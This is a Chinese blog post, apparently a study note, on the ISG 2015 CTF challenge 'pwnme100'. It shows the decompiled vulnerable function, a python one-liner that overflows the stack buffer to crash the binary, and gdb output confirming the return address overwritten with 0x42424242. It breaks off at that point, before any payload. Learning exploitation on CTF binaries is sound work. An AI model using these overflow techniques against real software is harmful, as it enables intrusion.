ISG pwnme100 poc 学习

ISG pwnme100 poc 学习

背景

最近在学习ISG2015比赛的 FlappyPig 的writeup（http://bobao.360.cn/learning/detail/702.html），对其中的pwn比较感兴趣，因此查阅了部分资料后对poc进行了研究。
其中在csdn上海枫的专栏（http://blog.csdn.net/column/details/buffer-overflow.html）非常深刻的讲解了缓冲区溢出漏洞原理、实践和不同溢出攻击的技术分析，非常好，值得深看。
其次乌云知识平台上的linux常见漏洞利用技术实践（http://drops.wooyun.org/binary/6521），对如何利用缓冲溢出进行了入门的讲解。

程序分析

实验环境是

root@mifan:~/Desktop/isg/pwnme# cat /etc/debian_version 
Kali Linux 2.0
root@mifan:~/Desktop/isg/pwnme# uname -a
Linux mifan 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux

同ida反汇编得到存在漏洞的程序如下：

int sub_804847D()
{
  int v1; // [sp+18h] [bp-8h]@1

  alarm(0x3Cu);
  write(1, "Welcome to ISG 2015!\nPwn me to get the flag:\n", 0x2Du);
  read(0, &v1, 0x100u);
  return 0;
}

运行程序，尝试最后得到如下几个：

root@mifan:~/Desktop/isg/pwnme# python -c "print 'A'*20+'BBBB'"|./pwnme 
Welcome to ISG 2015!
Pwn me to get the flag:
Segmentation fault (core dumped)

注意：如果没有产生coredump，可以通过ulimit -c unlimited设置
确定是否覆盖了返回eip可以查看海枫的《缓冲区溢出攻击实践》(http://blog.csdn.net/linyt/article/details/43283331)
分析core文件

root@mifan:~/Desktop/isg/pwnme# gdb pwnme core 
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from pwnme...(no debugging symbols found)...done.
[New LWP 1451]
Core was generated by `./pwnme'.
Program terminated with signal SIGSEGV, Segmentation fault.
**#0  0x42424242